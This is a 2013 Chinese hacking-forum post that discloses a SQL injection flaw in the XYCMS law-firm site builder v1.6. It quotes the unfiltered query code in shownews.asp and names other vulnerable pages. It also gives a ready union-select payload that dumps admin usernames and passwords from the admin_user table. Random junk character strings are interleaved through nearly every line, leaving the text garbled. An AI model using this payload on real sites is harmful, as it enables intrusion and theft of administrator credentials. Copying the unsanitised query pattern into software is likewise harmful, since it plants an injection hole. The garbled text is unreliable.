找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2192|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
, k8 u3 Q: V9 |7 n. L ' c4 i% v: C% o2 Q/ B
淫荡分割线
$ t8 t  F, ~3 {- `% x3 D5 e# N5 m3 c--------------------------------------------------------
; d5 Y) S: \4 s/ @" t, r + k7 w! I  b. ?* I, L# b
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
) s6 T  n' @! y; S5 a: {源码地址:http://down.chinaz.com/soft/29233.htm
5 U' F; g7 i3 i7 W ! S  n' E  C$ r0 _, n+ C
漏洞文件:shownews.asp8 O6 m  |) t+ I% H! w
漏洞代码:7-13行
1 `2 O- _; z; [: G ; c6 n. J1 f  N& M) C

7 l" c" W" x1 _" M  c3 ^" o<% & p- [9 ^3 J: ]* w* P
id=request.QueryString("id")
+ C* X+ u% X7 s- Z' {! d   
# @: G, S) Q% n9 r6 e- u+ u, Z, [# jset snews=server.createobject("adodb.recordset")
6 g6 o$ N; w: o/ |exec="select * from [news] where id="&id( F6 y( s9 t! }) l) z+ w
snews.open exec,conn,1,1
  t8 e) g& i! }; o% R& p+ U* E8 w%># s* T$ ^2 H% `  f% ]6 ]+ ]

( w: \) N# {$ p( H- w
$ E  p! J# ^* @' V$ T什么过滤都没有  直造成注入" n/ K1 T% G% K" Q  }

5 H5 x. a$ _8 Y7 r+ p3 _& w; y注入点:http://127.0.0.1:99/shownews.asp?id=xx
* m0 i8 U1 D7 p4 Q! Q: s - O! z# K( o% t5 C/ s/ t/ Y
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找6 e) t: u. _" X8 }- \

; Y% Z, s/ X" m7 z( n" i3 a0 E. g
; i" R! m8 ^& z3 [$ B2 jexp: union select 1,admin,password,4,5,7 from admin_user: m9 s" S/ `9 w5 ^5 F) M# d* Y0 {

- u/ F% Y0 d0 _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表